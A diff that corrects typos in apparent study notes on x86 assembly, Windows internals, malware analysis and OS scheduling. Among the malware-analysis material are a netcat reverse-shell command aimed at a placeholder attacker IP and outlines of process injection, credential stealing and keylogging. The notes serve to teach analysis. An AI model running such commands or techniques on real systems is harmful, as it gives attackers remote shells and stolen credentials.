**Code** - Includes the instructions fetched by the CPU to execute the program’s tasks. The code controls what the program does
|
||||
|
||||
**Heap** - The heap is used for dynamic memory during program execution, to create (or allocate) new values and eliminate (free) values that the program no longer needs. The heap’s size changes frequently while the program runs
|
||||
|
||||
@@ -37,7 +37,7 @@ Each instruction is comprised of an **opcode** and zero or more **operands**.
|
||||
|
||||
**operand** - argument or data
|
||||
|
||||
**endianess**
|
||||
**endianness**
|
||||
|
||||
- Whether the most significant bit is at the start or the end of a binary stream.
|
||||
- **Big-endian** is where the most significant bit is first
|
||||
@@ -69,13 +69,13 @@ A register is a small amount of data storage available to the CPU, that’s real
|
||||
|
||||

|
||||
|
||||
All general registers are 32-bits but can be referenced as either 32 or 16 bits in assembly code (for backwards compatibility reasons)
|
||||
All general registers are 32 bits but can be referenced as either 32 or 16 bits in assembly code (for backwards compatibility reasons)
|
||||
|
||||
`EDX` - full 32-bits
|
||||
`EDX` - full 32 bits
|
||||
|
||||
`DX` - lower 16 bits
|
||||
|
||||
Registers `EAX`, `EBX`, `ECX`, `EDX` can be referenced as 8 bit registers
|
||||
Registers `EAX`, `EBX`, `ECX`, `EDX` can be referenced as 8-bit registers
|
||||
|
||||

|
||||
|
||||
@@ -87,7 +87,7 @@ Some x86 instructions use specific registers by definition.
|
||||
|
||||
###### Flags
|
||||
|
||||
The `EFLAGS` register is a status register 32-bits big, this means it can store 32 flags. During execution, each flag is either set to 1 if true
|
||||
The `EFLAGS` register is a status register 32 bits big; this means it can store 32 flags. During execution, each flag is set to 1 if true
|
||||
|
||||
- **ZF** - The zero flag is set if the result of the operation was equal to zero
|
||||
- **CF** - The carry flag is set when the result of an operation is too large or too small for the destination operand.
|
||||
@@ -102,7 +102,7 @@ The `EFLAGS` register is a status register 32-bits big, this means it can store
|
||||
|
||||
`nop` - no operation - does nothing
|
||||
|
||||
When issued, execution simply preceeds to the next instruction
|
||||
When issued, execution simply proceeds to the next instruction
|
||||
|
||||
#### The Stack
|
||||
|
||||
@@ -118,13 +118,13 @@ Main code calls and temporarily transfers execution to functions before returnin
|
||||
|
||||
Many functions contain a **prologue** and an **epilogue**
|
||||
|
||||
- The **prologue** is a few lines of code at the start of the function which prepares the stack and registers for use within the function
|
||||
- The **prologue** is a few lines of code at the start of the function which prepare the stack and registers for use within the function
|
||||
- The **epilogue** is at the end of the function and restores the stack and registers to their state before the function was called
|
||||
|
||||
When a function is called:
|
||||
|
||||
1. Arguments are placed on the stack using `push` instructions
|
||||
2. A function called using `memory_location` which changes `EIP` to the address of the first instruction in the function and returns `EIP` to main code once the function is finished
|
||||
2. A function is called using `memory_location` which changes `EIP` to the address of the first instruction in the function and returns `EIP` to main code once the function is finished
|
||||
3. The function prologue pushes local variables, parameters and `EBP` onto the stack
|
||||
4. The function executes
|
||||
5. The function epilogue restores the stack, `ESP` is adjusted to free local variables, and `EBP` is restored so that the calling function can address its variables.
|
||||
@@ -138,7 +138,7 @@ When a function is called:
|
||||
|
||||
###### Passing Arguments
|
||||
|
||||
`c` functions and windows `api` calls, functions are called differently.
|
||||
`c` functions and Windows `api` calls use different calling conventions.
|
||||
|
||||
There are two things to think about
|
||||
|
||||
@@ -164,7 +164,9 @@ ret = test (a, b, c);
|
||||
|
||||
- Return value stored in `EAX`
|
||||
|
||||
- ```assembly
|
||||
- Example:
|
||||
|
||||
```assembly
|
||||
push c
|
||||
push b
|
||||
push a
|
||||
@@ -189,12 +191,11 @@ ret = test (a, b, c);
|
||||
- In `fastcall` the first few arguments (typically first two) are passed in registers `EDX` and `ECX`
|
||||
- Additional arguments are loaded right to left
|
||||
- Calling function is responsible for cleaning the stack
|
||||
- This is quicker as less data needs to be pushed to and retrived from the stack
|
||||
- # Functions have underscore prefix, name followed by `@` and length of arguments
|
||||
- This is quicker as less data needs to be pushed to and retrieved from the stack
|
||||
- Functions have an underscore prefix, name followed by `@` and length of arguments
|
||||
|
||||
When debugging windows functions, you can look at `EBP` to retrace the route the program took through the code
|
||||
When debugging Windows functions, you can look at `EBP` to retrace the route the program took through the code
|
||||
|
||||
#### Conditionals
|
||||
|
||||

|
||||
|
||||
@@ -4,7 +4,7 @@
|
||||
|
||||
### Global vs Local Variables
|
||||
|
||||
*Globbal variables* can be accessed and used by any function in the program.
|
||||
*Global variables* can be accessed and used by any function in the program.
|
||||
|
||||
*Local variables* can be accessed only by the function in which they are defined.
|
||||
|
||||
@@ -107,7 +107,7 @@ while (status == 0)
|
||||
}
|
||||
```
|
||||
|
||||
The assembly for this code will look similar from before however it lacks the *increment* section.
|
||||
The assembly for this code will look similar to before; however, it lacks the *increment* section.
|
||||
|
||||
```assembly
|
||||
mov [ebp+var_4], 0
|
||||
@@ -151,8 +151,6 @@ void main()
|
||||
}
|
||||
```
|
||||
|
||||
|
||||
|
||||

|
||||
|
||||
### Switch Statements
|
||||
|
||||
@@ -4,17 +4,17 @@
|
||||
|
||||
##### Types and Hungarian Notation
|
||||
|
||||
`DWORD` - 32 bit unsigned integer
|
||||
`DWORD` - 32-bit unsigned integer
|
||||
|
||||
`WORD` - 16 bit unsigned integer
|
||||
`WORD` - 16-bit unsigned integer
|
||||
|
||||
Hungarian notation is where variables are prefixed with their data type e.g. `dwSize` has prefix `dw` for `DWORD` indicating it is a 32 bit unsigned int
|
||||
Hungarian notation is where variables are prefixed with their data type e.g. `dwSize` has prefix `dw` for `DWORD` indicating it is a 32-bit unsigned int
|
||||
|
||||
| Type and Prefix | Description |
|
||||
| ------------------- | ------------------------------------------------------------ |
|
||||
| `WORD` (`w`) | A 16 bit unsigned vvalue |
|
||||
| `WORD` (`w`) | A 16-bit unsigned value |
|
||||
| `DWORD` (`dw`) | A double word, 32-bit unsigned value |
|
||||
| Handles (`H`) | A reference to an object. The information stored in the handle is no documented, and the handle should be manipulated only by the Windows API |
|
||||
| Handles (`H`) | A reference to an object. The information stored in the handle is not documented, and the handle should be manipulated only by the Windows API |
|
||||
| Long Pointer (`LP`) | A pointer to another type e.g. `LPByte` is a pointer to a byte. Strings are usually prefixed with `LP` because they are actually pointers. |
|
||||
| Callback | Represents a function that will be called by the Windows API |
|
||||
|
||||
@@ -24,7 +24,7 @@ Hungarian notation is where variables are prefixed with their data type e.g. `dw
|
||||
|
||||
- Handles are like pointers in that they refer to an object or memory location
|
||||
- Unlike pointers handles cannot be used in arithmetic operations
|
||||
- The only use case is storing it and use it later in a function call
|
||||
- The only use case is storing it and using it later in a function call
|
||||
|
||||
##### File System Functions
|
||||
|
||||
@@ -42,7 +42,7 @@ Windows has a number of file types that can be accessed much like regular files,
|
||||
|
||||
###### Shared Files
|
||||
|
||||
Sharted files are special files with names that start with `\\serverName\share` or `\\?\serverName\share`
|
||||
Shared files are special files with names that start with `\\serverName\share` or `\\?\serverName\share`
|
||||
|
||||
- They access directories or files in a shared folder stored on a network.
|
||||
- `\\?\` prefix tells the OS to disable all string parsing and allows access to longer filenames
|
||||
@@ -62,7 +62,7 @@ The `Win32` device namespace (prefix `\\.\`) is often used to access physical de
|
||||
|
||||
###### Alternate Data Streams
|
||||
|
||||
ADS allows additional data to be addwed to an existing file within `NTFS`
|
||||
ADS allows additional data to be added to an existing file within `NTFS`
|
||||
|
||||
- The extra data doesn’t show up in a directory listing nor when displaying the contents of the file
|
||||
- It’s only visible when accessing the stream
|
||||
@@ -72,7 +72,7 @@ ADS allows additional data to be addwed to an existing file within `NTFS`
|
||||
|
||||
The *Windows registry* is used to store OS and program configuration information, such as settings and options.
|
||||
|
||||
In early versions of windows the registry was just a hierarchy of `.ini` files to improve performance.
|
||||
In early versions of Windows the registry was just a hierarchy of `.ini` files to improve performance.
|
||||
|
||||
Malware often uses the registry for *persistence* or configuration data. The malware adds entries into the registry that will allow it to run automatically when the computer boots.
|
||||
|
||||
@@ -119,12 +119,12 @@ To store malicious code:
|
||||
By using Windows `dll`s:
|
||||
|
||||
- Windows dlls contain the functionality to interact with the OS
|
||||
- By looking at what dlls are used can help find the functionality of the malware
|
||||
- Looking at what dlls are used can help find the functionality of the malware
|
||||
|
||||
By using third-party `dll`s
|
||||
|
||||
- This can provide further insight to what the malware does
|
||||
- e.g. if it uses a mozilla `dll` instead of the standard windows api, it might be usiing functions not found in the windows api such as encryption
|
||||
- e.g. if it uses a Mozilla `dll` instead of the standard Windows API, it might be using functions not found in the Windows API such as encryption
|
||||
|
||||
`DLL`s are similar to `EXE`s, there’s a flag in the PE to indicate the file is a dll.
|
||||
|
||||
@@ -138,11 +138,11 @@ By using third-party `dll`s
|
||||
|
||||
#### Threads
|
||||
|
||||
Processes are the container for execution, but *threads* are what the windows OS executes.
|
||||
Processes are the container for execution, but *threads* are what the Windows OS executes.
|
||||
|
||||
- Threads are independent sequences of instructions that are executed by the CPU without waiting for other threads
|
||||
- A process contains one or more threads, which execute part of the code within a process.
|
||||
- Threads within a process all share a memory space but have seperate registers and stack
|
||||
- Threads within a process all share a memory space but have separate registers and stacks
|
||||
|
||||
`CreateThread` can be used to create new threads
|
||||
|
||||
@@ -159,5 +159,5 @@ Another way for malware to execute additional code is by installing it as a *ser
|
||||
- Key service functions:
|
||||
- `OpenSCManager` Returns a handle to the service control manager
|
||||
- `CreateService` - Adds a new service to the service control manager
|
||||
- Allows caller to specify whether the service will start automatically at boot time, or started manually
|
||||
- Allows the caller to specify whether the service will start automatically at boot time or be started manually
|
||||
- `StartService` Starts the service, only used if service needs to be started manually
|
||||
@@ -16,7 +16,7 @@ Linear disassembly strategy iterates over a block of code, disassembling one ins
|
||||
|
||||
This method is used by IDA
|
||||
|
||||
- The key difference between linear and flow-oriented is that the disassembler doesn’t blindly irate over a buffer, assuming the data is noting but instructions packed neatly together
|
||||
- The key difference between linear and flow-oriented is that the disassembler doesn’t blindly iterate over a buffer, assuming the data is nothing but instructions packed neatly together
|
||||
- Instead it examines each instruction and builds a list of locations to disassemble
|
||||
- Most flow-oriented disassemblers will process the false branch of a conditional jump
|
||||
- Pressing the `C` key turns the cursor location into code
|
||||
@@ -77,15 +77,15 @@ E8 db 0E8h
|
||||
C3 retn
|
||||
```
|
||||
|
||||
- This only shows the instructions that are relevent to understanding the program
|
||||
- This only shows the instructions that are relevant to understanding the program
|
||||
- However this solution may interfere with flow graphs.
|
||||
- Since its difficult to tell how the `xor`, `pop` and `retn` instructions are used
|
||||
- Since it’s difficult to tell how the `xor`, `pop` and `retn` instructions are used
|
||||
|
||||
### Obscuring Flow Control
|
||||
|
||||
#### The Function Pointer Problem
|
||||
|
||||
If function pointers are used in handwritten assembly or crafted in a **nonstandard way** in source code, the results can be difficult to reverseengineer without dynamic analysis.
|
||||
If function pointers are used in handwritten assembly or crafted in a **nonstandard way** in source code, the results can be difficult to reverse-engineer without dynamic analysis.
|
||||
|
||||
```assembly
|
||||
004011D0 sub_4011D0 proc near ; CODE XREF: _main+19p
|
||||
|
||||
@@ -1,18 +1,18 @@
|
||||
# Data Encoding
|
||||
|
||||
Malware uses encoding for a variety of reasons, the main one is for encrypting network-based communication.
|
||||
Malware uses encoding for a variety of reasons; the main one is for encrypting network-based communication.
|
||||
|
||||
- Malware needs to hide its intent
|
||||
- This applies to both its operation but also to the data it uses
|
||||
- This applies both to its operation and to the data it uses
|
||||
- Data encoding refers to all forms of content modification used for the purpose of hiding intent
|
||||
- Malware will use data encoding to:
|
||||
- Hide configuration information
|
||||
- Save information to a staging file before stealing it
|
||||
- To store strings used by the malware
|
||||
- Store strings used by the malware
|
||||
- Imagine a key logger, logs what the user is searching for. The file would come up
|
||||
- Disguise itself as a legitimate tool
|
||||
|
||||
When analysing the goal is to first find the encryption functions and then using that to decode whatever information is encoded.
|
||||
When analysing, the goal is to first find the encryption functions and then use them to decode whatever information is encoded.
|
||||
|
||||
#### Mechanisms for data encoding
|
||||
|
||||
@@ -41,7 +41,7 @@ When analysing the goal is to first find the encryption functions and then using
|
||||
- Look at each result to see if anything interesting pops out
|
||||
- Can also be pre-computed if you know a string might be present
|
||||
- e.g. `This program cannot be run in DOS mode`
|
||||
- $k \oplus 0=k$, in the pre-ample there’s a lot of 0s, which means the key will be visible
|
||||
- $k \oplus 0=k$, in the preamble there are a lot of 0s, which means the key will be visible
|
||||
|
||||
#### Null-Preserving Single Byte XOR Encoding
|
||||
|
||||
@@ -62,7 +62,7 @@ while(c = fgetc(fi), c!=EOF)
|
||||
}
|
||||
```
|
||||
|
||||
- Relatively straight-forward to find this code in a disassembler
|
||||
- Relatively straightforward to find this code in a disassembler
|
||||
- Search for `xor` instructions
|
||||
- There will be several (xor is used to set registers to zero)
|
||||
- Look out for instructions that:
|
||||
@@ -74,7 +74,7 @@ Other encodings
|
||||
|
||||
- Using addition and subtraction
|
||||
- Using bit rotation
|
||||
- ROT-n (the original ceaser cipher)
|
||||
- ROT-n (the original Caesar cipher)
|
||||
- Multibyte (using a longer key)
|
||||
- Chained or loopback
|
||||
- Encoding the data with itself
|
||||
@@ -86,7 +86,7 @@ Base64 encoding is used to represent binary data in an ASCII string format and i
|
||||
|
||||
#### Encoding with Base64
|
||||
|
||||
- It used 24-bit (3-byte) chunks
|
||||
- It uses 24-bit (3-byte) chunks
|
||||
- The first character is placed in the most significant position
|
||||
- The second in the middle 8 bits
|
||||
- The third in the least significant 8 bits
|
||||
@@ -96,7 +96,7 @@ Base64 encoding is used to represent binary data in an ASCII string format and i
|
||||
|
||||
#### Identifying and Decoding Base64
|
||||
|
||||
The best way to find this type of encoding is looking for the encoding string.
|
||||
The best way to find this type of encoding is to look for the encoding string.
|
||||
|
||||
`ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/`
|
||||
|
||||
|
||||
@@ -2,7 +2,7 @@
|
||||
|
||||
- Malware will often exploit other processes on the system
|
||||
- Either already running, or by running them
|
||||
- It does this to hide it’s activity
|
||||
- It does this to hide its activity
|
||||
|
||||
### Process Injection
|
||||
|
||||
@@ -31,7 +31,7 @@
|
||||
- Related technique
|
||||
- Inject code directly rather than path to `DLL`
|
||||
- Use `VirtualAllocEx()` to allocate memory
|
||||
- Need to ensure its marked as executable
|
||||
- Need to ensure it’s marked as executable
|
||||
- `WriteProcessMemory()` used to copy over code
|
||||
- `CreateRemoteThread()` used to start code
|
||||
- Harder to write code for direct injection
|
||||
@@ -39,7 +39,7 @@
|
||||
|
||||
#### Non-traditional Loading
|
||||
|
||||
- Malware code isn’t alywas loaded in traditional fashion
|
||||
- Malware code isn’t always loaded in traditional fashion
|
||||
- Could be delivered by making use of an exploit, or process injection
|
||||
- Would be delivered as a small chunk of raw machine code
|
||||
- Not loaded in the traditional sense
|
||||
@@ -51,7 +51,7 @@
|
||||
- Can use this to create structures or store strings, by pushing the relevant values and capturing the address
|
||||
- This code has a problem
|
||||
- To do anything, the program is going to need to make Windows API calls
|
||||
- Windows APU calls are normally made by making indirect calls to relevant implementation in the `DLL`
|
||||
- Windows API calls are normally made by making indirect calls to the relevant implementation in the `DLL`
|
||||
- Normally Windows links the calls to the `DLL`s at load time but the malware code wasn’t ‘loaded’
|
||||
- The malware code does not know where the `DLL`s have been loaded into memory
|
||||
|
||||
@@ -76,7 +76,9 @@
|
||||
|
||||
- `mov eax, fs:[0x30]`
|
||||
|
||||
- ```c
|
||||
- Example:
|
||||
|
||||
```c
|
||||
PEB *GetPEB()
|
||||
{
|
||||
_asm mov eax, fs:[0x30]
|
||||
@@ -88,11 +90,13 @@
|
||||
- `PEB_LDR_DATA` structure points to a linked list containing each module
|
||||
|
||||
- List entry contains the module’s filename
|
||||
- And the base address of where its been loaded
|
||||
- And the base address of where it’s been loaded
|
||||
- Points to the start of the DOS file header
|
||||
- Can search this linked list until we find the `DLL` of interest
|
||||
|
||||
- ```c
|
||||
- Example:
|
||||
|
||||
```c
|
||||
typedef struct _LDR_DATA_TABLE_ENTRY {
|
||||
PVOID Reserved1[2];
|
||||
LIST_ENTRY InMemoryOrderLinks;
|
||||
|
||||
@@ -5,7 +5,7 @@
|
||||
*Downloaders* simply download another piece of malware from the internet and execute it on the local system. Downloaders are often packaged with an exploit.
|
||||
|
||||
- Downloaders often use `URLDownloadToFileA`
|
||||
- Followed by a called to `WinExec`
|
||||
- Followed by a call to `WinExec`
|
||||
- To download and execute the new malware
|
||||
- Are often called *droppers*
|
||||
|
||||
@@ -17,7 +17,7 @@ A launcher is any executable that installs malware for immediate or future cover
|
||||
|
||||
### Backdoors
|
||||
|
||||
A *backdoor* is a type of malware that provides an attacker with remote access to a victims machine. Backdoor code often implements a full set of capabilities so when using a backdoor, attackers don't need to download additional malware or code.
|
||||
A *backdoor* is a type of malware that provides an attacker with remote access to a victim’s machine. Backdoor code often implements a full set of capabilities so when using a backdoor, attackers don't need to download additional malware or code.
|
||||
|
||||
- Common variants
|
||||
- Reverse Shells
|
||||
@@ -38,11 +38,11 @@ A *backdoor* is a type of malware that provides an attacker with remote access t
|
||||
A reverse shell is a connection that originates from an infected machine and provides attackers shell access to that machine.
|
||||
|
||||
- The simplest type of backdoor
|
||||
- Provides attack with standard shell
|
||||
- Provides the attacker with a standard shell
|
||||
- Offers same functionality as being logged into the machine
|
||||
- Called a reverse shell because rather than the attacker connecting to the infected machine, the infected machine connects back to the attackers machine
|
||||
- Called a reverse shell because rather than the attacker connecting to the infected machine, the infected machine connects back to the attacker’s machine
|
||||
- This is done as the victim's machine is often sitting behind a firewall blocking incoming traffic on most ports.
|
||||
- Whereas outgoing traffic on random high number ports is often unblocked
|
||||
- Whereas outgoing traffic on random high-numbered ports is often unblocked
|
||||
- Either offered standalone or as part of a more sophisticated backdoor
|
||||
|
||||
##### Creating a reverse shell
|
||||
@@ -51,17 +51,21 @@ A reverse shell is a connection that originates from an infected machine and pro
|
||||
|
||||
- Can be created quite simply using the `netcat` program
|
||||
|
||||
- This is done by setting up a listener on the attackers machine
|
||||
- This is done by setting up a listener on the attacker’s machine
|
||||
|
||||
- ```bash
|
||||
- Example:
|
||||
|
||||
```bash
|
||||
nc -l -p 80
|
||||
```
|
||||
|
||||
- Where `-l` is the listen flag and `-p` is the port flag to listen on 80
|
||||
|
||||
- Then netcat is run on the victims machine
|
||||
- Then netcat is run on the victim’s machine
|
||||
|
||||
- ```bash
|
||||
- Example:
|
||||
|
||||
```bash
|
||||
nc <attackers ip> 80 -e cmd.exe
|
||||
```
|
||||
|
||||
@@ -71,17 +75,17 @@ A reverse shell is a connection that originates from an infected machine and pro
|
||||
|
||||
###### Using Windows API
|
||||
|
||||
This can be done in two ways: basic and multi-threaded
|
||||
This can be done in two ways: basic and multi-threaded
|
||||
|
||||
The **basic** method is popular as is easy to write and achieves the same thing.
|
||||
The **basic** method is popular as it is easy to write and achieves the same thing.
|
||||
|
||||
It uses a call to `CreateProcess` and manipulates the `STARTUPINFO` structure.
|
||||
It uses a call to `CreateProcess` and manipulates the `STARTUPINFO` structure.
|
||||
|
||||
1. First a socket to the remote server is established
|
||||
2. That sockets standard streams are stored and spliced into `STARTUPINFO`
|
||||
3. So that when `CreateProcess` is called with the `STARTUPINFO` passed in, standard input, output and error is piped to the attacker
|
||||
1. First a socket to the remote server is established
|
||||
2. That socket’s standard streams are stored and spliced into `STARTUPINFO`
|
||||
3. So that when `CreateProcess` is called with the `STARTUPINFO` passed in, standard input, output and error are piped to the attacker
|
||||
|
||||
The multithreaded approach is the same, except instead of tying the streams from command line directly to the socket, two threads sit inbetween (one for input, one for output) . These threads can be used to encrypt and decrypt data so is not sent in the clear.
|
||||
The multithreaded approach is the same, except instead of tying the streams from the command line directly to the socket, two threads sit in between (one for input, one for output). These threads can be used to encrypt and decrypt data so it is not sent in the clear.
|
||||
|
||||
- API calls `CreateThread` and `CreatePipe` should be looked for
|
||||
- The two pipes are needed to redirect input and output to the thread
|
||||
@@ -100,7 +104,7 @@ The multithreaded approach is the same, except instead of tying the streams from
|
||||
|
||||

|
||||
|
||||
Server will poll the client for new commands - there is not a permanent connection (as to not arouse suspicion)
|
||||
Server will poll the client for new commands - there is not a permanent connection (so as not to arouse suspicion)
|
||||
|
||||
### Botnet
|
||||
|
||||
@@ -112,21 +116,21 @@ Server will poll the client for new commands - there is not a permanent connecti
|
||||
| ------------------------------ | ------------------------------ |
|
||||
| Typically control fewer hosts | Infect millions |
|
||||
| Used in targeted attacks | Used in mass attack |
|
||||
| Controlled on per-victim level | All zombies controlled as once |
|
||||
| Controlled on per-victim level | All zombies controlled at once |
|
||||
|
||||
### Credential Stealing
|
||||
|
||||
- Attackers will go to great lengths to steal credentials
|
||||
- Three general approaches
|
||||
- Programs that waits for a user to log in
|
||||
- Programs that wait for a user to log in
|
||||
- Programs that dump information stored in Windows (e.g password hashes)
|
||||
- Programs that log keystrokes
|
||||
|
||||
#### Windows Login
|
||||
|
||||
- Windows enables you to extend the login mechanism
|
||||
- In windows XP, this was done by *Graphical Identification* *and Authentication* (GINA) API
|
||||
- Later windows versions use *Credential Provider*
|
||||
- In Windows XP, this was done by the *Graphical Identification* *and Authentication* (GINA) API
|
||||
- Later Windows versions use *Credential Provider*
|
||||
- Possible to use these to install credential stealers by pretending to be a credential provider
|
||||
|
||||
Place a piece of code between `winlogin.exe` and `magina.dll`. By changing the `dll` to a malicious one.
|
||||
@@ -146,20 +150,20 @@ Place a piece of code between `winlogin.exe` and `magina.dll`. By changing the `
|
||||
- Alternative approach is to log user key presses
|
||||
- This will capture any password typed into the system
|
||||
- Keyloggers can be implemented in both kernel space and user space
|
||||
- Kernel based is very difficult to detected with user level applications
|
||||
- Frequently used as part of a root kit
|
||||
- Act as a keyboard driver to capture keystrokes bypasses user-space programs and protections
|
||||
- Kernel-based is very difficult to detect with user-level applications
|
||||
- Frequently used as part of a rootkit
|
||||
- Acting as a keyboard driver to capture keystrokes bypasses user-space programs and protections
|
||||
|
||||
#### User-space keyloggers
|
||||
|
||||
- Windows API provides two ways to implement a keylogger in user-space
|
||||
- Hooking - get windows to notify the malware every time a key is pressed
|
||||
- Hooking - get Windows to notify the malware every time a key is pressed
|
||||
- Hooking typically makes use of `SetWindowsHookEx()`
|
||||
- Can alter key presses as well
|
||||
- Typically will include `.exe` which will intiate the hook function
|
||||
- Typically will include an `.exe` which will initiate the hook function
|
||||
- And a `dll` to handle the logging
|
||||
- This `dll` is injected to other processes on the system
|
||||
- Polling - malware interrogrates Windows to see if a specific key is pressed
|
||||
- Polling - malware interrogates Windows to see if a specific key is pressed
|
||||
- Make use of the `GetAsyncKeyState()` API function which returns a boolean
|
||||
- All the keys are iterated through to see what specific key is pressed
|
||||
- `GetForegroundWindow()` - shows window title
|
||||
@@ -197,7 +201,7 @@ Place a piece of code between `winlogin.exe` and `magina.dll`. By changing the `
|
||||
###### SVCHOST DLLs
|
||||
|
||||
- Malware often installed as a Windows service
|
||||
- But typically requires implementing as a `exe`
|
||||
- But typically requires implementing as an `exe`
|
||||
- However, Windows provides `svchost.exe` that lets you implement a service as a `dll`
|
||||
- Many Windows services are implemented as a `DLL` using `svchost.exe`
|
||||
- Causes the malware to blend into the process list and registry better
|
||||
@@ -1,50 +1,52 @@
|
||||
05/10/20
|
||||
---
|
||||
The OS is responsible for *managing* and *scheduling processes*
|
||||
>Decide when to admit processes to the system (new -> ready)
|
||||
> Decide when to admit processes to the system (new -> ready)
|
||||
>
|
||||
>Decide which process to run next (ready -> run)
|
||||
> Decide which process to run next (ready -> run)
|
||||
>
|
||||
>Decide when and which processes to interrupt (running -> ready)
|
||||
> Decide when and which processes to interrupt (running -> ready)
|
||||
|
||||
It relies on the *scheduler* (dispatcher) to decide which process to run next, which uses a scheduling algorithm to do so.
|
||||
|
||||
The type of algorithm used by the scheduler is influenced by the type of operating system e.g. real time vs batch.
|
||||
The type of algorithm used by the scheduler is influenced by the type of operating system, e.g. real-time vs batch.
|
||||
|
||||
**Long Term**
|
||||
|
||||
- Applies to new processes and controls the degree of multi-programming by deciding which processes to admit to the system when:
|
||||
- A good mix of CPU and I/O bound processes is favourable to keep all resources as bust as possible
|
||||
- A good mix of CPU and I/O bound processes is favourable to keep all resources as busy as possible
|
||||
- Usually absent in popular modern OS
|
||||
|
||||
**Medium Term**
|
||||
|
||||
>Controls swapping and the degree of multi-programming
|
||||
> Controls swapping and the degree of multi-programming
|
||||
|
||||
**Short Term**
|
||||
|
||||
- Decide which process to run next
|
||||
- Manages the *ready queue*
|
||||
- Invoked very frequency, hence must be fast
|
||||
- Invoked very frequently, hence must be fast
|
||||
- Usually called in response to *clock interrupts*, *I/O interrupts*, or *blocking system calls*
|
||||
|
||||

|
||||
|
||||
**Non-preemptive** processes are only interrupted voluntarily (e.g. I/O operation or "nice" system call `yield()`)
|
||||
>Windows 3.1 and DOS were non-preemptive
|
||||
**Non-preemptive** processes are only interrupted voluntarily (e.g. an I/O operation or the "nice" system call `yield()`)
|
||||
> Windows 3.1 and DOS were non-preemptive
|
||||
>
|
||||
>The issue with this is if the process in control goes wrong or gets stuck in a infinite loop then the CPU will never regain control.
|
||||
> The issue with this is that if the process in control goes wrong or gets stuck in an infinite loop, the CPU will never regain control.
|
||||
|
||||
**Preemptive** processes can be interrupted forcefully or voluntarily
|
||||
**Pre-emptive** processes can be interrupted forcefully or voluntarily
|
||||
|
||||
>This required context switches which generate *overhead*, too many of them show me avoided.
|
||||
> This requires context switches, which generate *overhead*. Too many of them should be avoided.
|
||||
>
|
||||
>Prevents processes from monopolising the CPU
|
||||
> Prevents processes from monopolising the CPU
|
||||
>
|
||||
>Most popular modern OS use this kind.
|
||||
> Most popular modern OS use this kind.
|
||||
|
||||
Overhead - wasted CPU cycles
|
||||
How can we objectively critic the OS?
|
||||
How can we objectively critique the OS?
|
||||
|
||||
**User Oriented criteria**
|
||||
**User-Oriented Criteria**
|
||||
*Response time* minimise the time between creating the job and its first execution (time between clicking the button and it starting)
|
||||
*Turnaround time* minimise the time between creating the job and finishing it
|
||||
*Predictability* minimise the variance in processing times
|
||||
@@ -57,6 +59,7 @@ How can we objectively critic the OS?
|
||||
> Are some processes kept waiting excessively long - **starvation**
|
||||
|
||||
### Different types of Scheduling Algorithms
|
||||
|
||||
[NOTE: FCFS = FIFO]
|
||||
|
||||
**First come first serve**
|
||||
@@ -64,27 +67,27 @@ Concept: a non-preemptive algorithm that operates as a strict queuing mechanism
|
||||
|
||||
| Pros | Cons |
|
||||
| ----------- | ----------- |
|
||||
| Positional fairness | Favours long processes over short ones (think supermarket checkout) || |
|
||||
| Positional fairness | Favours long processes over short ones (think supermarket checkout) |
|
||||
| Easy to implement | Could compromise resource utilisation |
|
||||
|
||||

|
||||
|
||||
**Shortest job first**
|
||||
A non-preemptive algorithm that starts processes in order of ascending processing time using a provided estimate of the processing
|
||||
A non-pre-emptive algorithm that starts processes in order of ascending processing time using a provided estimate of the processing time.
|
||||
|
||||
| Pros | Cons |
|
||||
| ----------- | ----------- |
|
||||
| Always results an optimal turnaround time | Starvation might occur |
|
||||
| Always results in an optimal turnaround time | Starvation might occur |
|
||||
| - | Fairness and predictability are compromised |
|
||||
| - | Processing times need to be known in advanced |
|
||||
| - | Processing times need to be known in advance |
|
||||
|
||||

|
||||
|
||||
**Round Robin**
|
||||
A preemptive version of FCFS that focuses context switches at periodic intervals or time slices
|
||||
A pre-emptive version of FCFS that focuses context switches at periodic intervals or time slices.
|
||||
|
||||
>Processes run in order that they were added to the queue.
|
||||
>Processes are forcefully interrupted by the timer.
|
||||
> Processes run in order that they were added to the queue.
|
||||
> Processes are forcefully interrupted by the timer.
|
||||
|
||||
| Pros | Cons |
|
||||
| ----------- | ----------- |
|
||||
@@ -93,20 +96,20 @@ A preemptive version of FCFS that focuses context switches at periodic intervals
|
||||
| - | Can reduce to FCFS |
|
||||
|
||||
Exam 2013: Round Robin is said to favour CPU bound processes over I/O bound processes. Explain why this may be the case.
|
||||
>I/O processes will spend a lot of their allocated time waiting for data to come back from memory, therefore less processing can occur before the time slice runs out.
|
||||
> I/O processes will spend a lot of their allocated time waiting for data to come back from memory, therefore less processing can occur before the time slice runs out.
|
||||
|
||||
If the time slice is only used partially the next process starts immediately
|
||||
The length of the time slice must be carefully considered.
|
||||
>A small time slice (~ 1ms) gives a good response time.
|
||||
>A large time slice (~ 1000ms) gives a high throughput.
|
||||
> A small time slice (~ 1ms) gives a good response time.
|
||||
> A large time slice (~ 1000ms) gives a high throughput.
|
||||
|
||||

|
||||
|
||||
**Priority Queue**
|
||||
A preemptive algorithm that schedules processes by priority
|
||||
A pre-emptive algorithm that schedules processes by priority.
|
||||
|
||||
>A round robin is used for processes with the same priority level
|
||||
>The process priority is saved in the process control block
|
||||
> A round robin is used for processes with the same priority level
|
||||
> The process priority is saved in the process control block
|
||||
|
||||
| Pros | Cons |
|
||||
| ----------- | ----------- |
|
||||
@@ -118,7 +121,8 @@ You could give higher priority processes a larger time slice to improve efficien
|
||||

|
||||
|
||||
Exam Q 2013: Which algorithms above lead to starvation?
|
||||
>Shortest job first and highest priority first.
|
||||
> Shortest job first and highest priority first.
|
||||
|
||||

|
||||
|
||||

|
||||
@@ -8,16 +8,16 @@ A process consists of two **fundamental** units
|
||||
- Files, I/O devices, I/O channels
|
||||
2. Execution trace e.g. an entity that gets executed
|
||||
|
||||
A process can share its resources between multiple execution traces, e.g multiple threads running in the same resource environment.
|
||||
A process can share its resources between multiple execution traces, e.g. multiple threads running in the same resource environment.
|
||||
|
||||

|
||||
|
||||
Every thread has its own *execution context* (e.g. program counter, stack, registers).
|
||||
All threads have **access** to the process' **shared resources**
|
||||
|
||||
>e.g. Files; if one thread opens a file then all threads have access to it
|
||||
> e.g. Files; if one thread opens a file then all threads have access to it
|
||||
>
|
||||
>Same with global variables, memory etc
|
||||
> Same with global variables, memory etc
|
||||
|
||||
Similar to processes, threads have:
|
||||
**States**, **transitions** and a **thread control block**
|
||||
